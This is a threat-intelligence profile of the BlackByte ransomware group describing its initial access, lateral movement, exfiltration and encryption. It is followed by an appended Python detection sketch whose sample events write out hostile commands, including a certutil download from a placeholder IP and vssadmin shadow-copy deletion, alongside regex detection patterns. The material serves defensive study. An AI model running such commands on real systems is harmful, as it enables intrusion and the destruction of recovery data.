BlackByte (Ransomware Group) – Threat Actor

February 16, 2025
Reading Time: 4 mins read
in Ransomware Group, Threat Actors
BlackByte

Date of Initial Activity: 2021

Suspected Attribution: Ransomware Group

Targeted Countries: Peru, Chile, Turkey, India, Netherlands, United States, United Kingdom, Philippines

Associated Tools: BlackByte Malware

Motivation: Financial Gain

Software: Windows, Linux, ESXi

Overview

BlackByte is a ransomware group that first emerged in July 2021 and quickly gained attention for its aggressive targeting of critical infrastructure sectors and its sophisticated tactics. Operating on a Ransomware-as-a-Service (RaaS) model, BlackByte enables affiliates to deploy its ransomware, further expanding its reach. While it shares many characteristics with other ransomware families, such as exploiting known vulnerabilities and leveraging phishing techniques for initial access, BlackByte stands out due to its evolving encryption strategies and use of custom-built tools. In particular, it made headlines in 2021 when it attacked a variety of industries, including government, financial, and food sectors, marking its presence on the global threat landscape.

One key aspect of BlackByte’s operations is its continuous adaptation to security measures. Initially, it used a symmetric key encryption model, which allowed for the development of a decrypter. However, after researchers released a tool to help victims, BlackByte quickly upgraded its encryption methods, implementing a more complex multi-key strategy that made decryption more difficult. This response underscores the group’s focus on maintaining a foothold in the ransomware space and avoiding the setbacks faced by earlier ransomware variants. As a result, it has maintained a steady pace of activity, with a notable uptick in attacks against Latin American targets, particularly government entities, in 2022.

Common targets

  • Information
  • Individuals
  • Peru
  • Chile
  • Turkey
  • India
  • Netherlands
  • United States
  • United Kingdom
  • Philippines

Attack Vectors

Phishing

Credential-based Attacks

Software Vulnerabilities

How they operate

The first step in a BlackByte attack typically involves gaining initial access to the victim’s network. The group has been known to exploit vulnerabilities, such as the ProxyShell flaw in Microsoft Exchange servers, which allows attackers to execute remote code and establish a foothold in the system. Alternatively, BlackByte uses phishing emails containing malicious payloads to trick users into executing the malware. Once the group gains access to the target environment, it deploys a custom tool called “Cobeacon” using the Windows tool Certutil, which enables further escalation and lateral movement.

Once BlackByte has established control over the victim’s system, the next step is discovery and lateral movement. Using tools like NetScan, the attackers conduct reconnaissance to understand the network topology and identify valuable targets. They then deploy AnyDesk, a legitimate remote access tool, to maintain control over the infected system and move laterally within the network. This technique allows BlackByte operators to deepen their access, reaching critical systems and increasing the likelihood of successful encryption. During this phase, BlackByte also terminates specific security processes to evade detection and hinder the effectiveness of endpoint protection.

Data exfiltration is a critical component of BlackByte’s operations, as the group seeks to steal sensitive information before deploying its ransomware. The malware uses WinRAR to archive important files and then uploads them to file-sharing sites such as anonymfiles[.]com or file[.]io. This step ensures that BlackByte operators have a copy of the stolen data, which can be used for double extortion, a tactic where the attacker threatens to leak the stolen data unless the ransom is paid.

After the data has been exfiltrated, BlackByte proceeds to encrypt the victim’s files using a custom encryption mechanism. The encryption process used by BlackByte is one of its defining features. Early versions of the ransomware employed symmetric AES encryption, which allowed researchers to develop a decryption tool. In response, BlackByte evolved its encryption strategy, implementing a more complex system that combines AES and RSA encryption. The ransomware generates an AES-128 key, which is encrypted with an RSA key. This layered encryption ensures that files cannot be decrypted without access to the private RSA key, making recovery without paying the ransom nearly impossible. Additionally, BlackByte deletes system shadow copies using the “vssadmin” command, further complicating recovery efforts for victims.

Finally, BlackByte concludes the attack by leaving a ransom note demanding payment in cryptocurrency in exchange for the decryption key. The note also includes a warning not to use publicly available decryption tools, as they are ineffective against the newer versions of the ransomware. This commitment to innovation and its RaaS model has allowed BlackByte to maintain a significant presence in the ransomware landscape, with its operators continuously refining their tactics to stay ahead of security measures.
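As an added example (not code from the page or its sources), the following Python detection sketch scores constructed process-creation and network events against the chain described above: Certutil use, NetScan, AnyDesk installation, WinRAR archiving, uploads to the named file-sharing sites, and vssadmin shadow-copy deletion. The event shape, host names, command lines and regex patterns are assumptions to be tuned against your own telemetry.

```python
import re
from collections import defaultdict

# Constructed sample telemetry in a simplified (event_type, host, image, detail)
# shape: "process" rows carry the command line, "network" rows the destination host.
SAMPLE_EVENTS = [
    ("process", "srv01", "certutil.exe", "certutil -urlcache -split -f http://203.0.113.5/x c:\\temp\\x"),
    ("process", "srv01", "netscan.exe", "netscan.exe /range:10.0.0.0/24"),
    ("process", "srv01", "AnyDesk.exe", "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"),
    ("process", "srv01", "WinRAR.exe", "WinRAR.exe a -r -ep1 c:\\temp\\fin.rar D:\\Finance"),
    ("network", "srv01", "curl.exe", "api.anonymfiles.com"),
    ("process", "srv01", "vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ("process", "ws07", "backup.exe", "vssadmin list shadows"),  # benign: listing only
]

# Each rule: (name, event_type it applies to, regex over "image detail").
# Patterns mirror the behaviours in the profile; they are starting points, not IoCs.
RULES = [
    ("certutil_download_or_decode", "process", r"certutil.*(-urlcache|-decode)"),
    ("network_scanner", "process", r"netscan\.exe"),
    ("remote_access_tool_install", "process", r"anydesk\.exe.*--install"),
    ("winrar_archiving", "process", r"winrar\.exe\s+a\b"),
    ("exfil_file_sharing_site", "network", r"(anonymfiles\.com|file\.io)$"),
    ("shadow_copy_deletion", "process", r"vssadmin.*delete\s+shadows"),
]

def evaluate(events):
    """Return {host: sorted list of distinct rule names that fired on that host}."""
    hits = defaultdict(set)
    for etype, host, image, detail in events:
        text = f"{image} {detail}"
        for name, rule_type, pattern in RULES:
            if etype == rule_type and re.search(pattern, text, re.IGNORECASE):
                hits[host].add(name)
    return {host: sorted(rules) for host, rules in hits.items()}

def flag_hosts(events, threshold=3):
    """Flag hosts showing >= threshold distinct stages of the chain, plus any host
    with shadow-copy deletion, which on its own warrants an immediate response."""
    flagged = {}
    for host, rules in evaluate(events).items():
        if len(rules) >= threshold or "shadow_copy_deletion" in rules:
            flagged[host] = rules
    return flagged

if __name__ == "__main__":
    for host, rules in flag_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```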